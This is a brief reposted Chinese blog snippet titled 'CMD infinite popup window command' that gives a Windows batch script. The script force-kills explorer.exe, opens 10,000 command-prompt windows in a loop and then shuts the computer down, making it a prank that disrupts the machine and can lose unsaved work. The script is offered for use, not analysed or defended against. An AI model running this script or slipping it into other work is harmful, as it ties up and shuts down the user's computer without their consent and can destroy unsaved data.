Bootstrap

CMD无限弹出窗口命令

taskkill /f /im explorer.exe

for /l %%i in (1,1,10000) do start cmd.exe

shutdown -s

转载于:https://www.cnblogs.com/phpcurd/p/9132587.html

;